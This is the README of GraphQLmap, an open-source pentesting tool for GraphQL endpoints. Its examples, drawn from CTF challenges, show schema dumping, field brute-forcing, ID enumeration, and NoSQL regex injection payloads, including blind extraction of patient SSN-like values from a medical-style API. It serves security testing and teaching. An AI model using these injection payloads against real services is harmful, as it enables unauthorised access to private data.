# GraphQLmap > GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. * [Install](#install) * [Features and examples](#features-and-examples) - [Dump a GraphQL schema](#dump-a-graphql-schema) - [Interact with a GraphQL endpoint](#interact-with-a-graphql-endpoint) - Execute GraphQL queries - Autocomplete queries - [GraphQL field fuzzing](#graphql-field-fuzzing) - [Example 1 - Bruteforce a character](#example-1---bruteforce-a-character) - [Example 2 - Iterate over a number](#example-2---iterate-over-a-number) - [NoSQL injection inside a GraphQL field](#nosql-injection) - [SQL injection inside a GraphQL field](#sqli-injection) I :heart: pull requests, feel free to improve this script :) You can also contribute with a :beers: IRL or using Github Sponsoring button. ## Install ```basic $ git clone https://github.com/swisskyrepo/GraphQLmap $ python setup.py install $ graphqlmap _____ _ ____ _ / ____| | | / __ \| | | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ | | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \ | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ | | | | |_| |_| Author:Swissky Version:1.0 usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]] [--json [USE_JSON]] [--proxy [PROXY]] optional arguments: -h, --help show this help message and exit -u URL URL to query : example.com/graphql?query={} -v [VERBOSITY] Enable verbosity --method [METHOD] HTTP Method to use interact with /graphql endpoint --headers [HEADERS] HTTP Headers sent to /graphql endpoint --json [USE_JSON] Use JSON encoding, implies POST --proxy [PROXY] HTTP proxy to log requests ``` ## Features and examples :warning: Examples are based on several CTF challenges from HIP2019. ### Connect to a graphql endpoint ```py # Connect using POST and providing an authentication token graphqlmap -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}' # Pass request through Burp Proxy graphqlmap -u "" --proxy ``` ### Dump a GraphQL schema Use `dump_new` to dump the GraphQL schema, this function will automaticly populate the "autocomplete" with the found fields. [:movie_camera: Live Example](https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S) ```powershell GraphQLmap > dump_new ============= [SCHEMA] =============== e.g: name[Type]: arg (Type!) Query doctor[]: email (String!), doctors[Doctor]: patients[Patient]: patient[]: id (ID!), allrendezvous[Rendezvous]: rendezvous[]: id (ID!), Doctor id[ID]: firstName[String]: lastName[String]: specialty[String]: patients[None]: rendezvous[None]: email[String]: password[String]: [...] ``` ### Interact with a GraphQL endpoint Write a GraphQL request and execute it. ```powershell GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}} { "data": { "doctors": [ { "firstName": "Admin", "id": "5d089c51dcab2d0032fdd08d", "lastName": "Admin" } ] } } ``` ### GraphQL field fuzzing Use `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter. [:movie_camera: Live Example](https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT) #### Example 1 - Bruteforce a character ```powershell GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}} ``` #### Example 2 - Iterate over a number Use `GRAPHQL_INCREMENT_` followed by a number. ```powershell GraphQLmap > { paste(pId: "GRAPHQL_INCREMENT_10") {id,title,content,public,userAgent} } [+] Query: (45) { paste(pId: "0") {id,title,content,public,userAgent} } [+] Query: (245) { paste(pId: "1") {id,title,content,public,userAgent} } [+] Query: (371) { paste(pId: "2") {id,title,content,public,userAgent} } [+] Query: (309) { paste(pId: "3") {id,title,content,public,userAgent} } [+] Query: (311) { paste(pId: "4") {id,title,content,public,userAgent} } [+] Query: (308) { paste(pId: "5") {id,title,content,public,userAgent} } [+] Query: (375) { paste(pId: "6") {id,title,content,public,userAgent} } [+] Query: (315) { paste(pId: "7") {id,title,content,public,userAgent} } [+] Query: (336) { paste(pId: "8") {id,title,content,public,userAgent} } [+] Query: (377) { paste(pId: "9") {id,title,content,public,userAgent} } GraphQLmap > { paste(pId: "9") {id,title,content,public,userAgent} } { paste(pId: "9") {id,title,content,public,userAgent} } { "data": { "paste": { "content": "I was excited to spend time with my wife without being interrupted by kids.", "id": "UGFzdGVPYmplY3Q6OQ==", "public": true, "title": "This is my first paste", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" } } } ``` ### NoSQLi injection Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function. [:movie_camera: Live Example](https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7) ```powershell GraphQLmap > nosqli Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} Check > 5d089c51dcab2d0032fdd08d Charset > 0123456789abcdef- [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b GraphQLmap > ``` ### SQL injection ```powershell GraphQLmap > postgresqli GraphQLmap > mysqli GraphQLmap > mssqli ``` ## Practice * [Damn Vulnerable GraphQL Application - @dolevf](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application/blob/master/setup.py) ## TODO * Unit tests * Handle node ``` { user { edges { node { username } } } } ```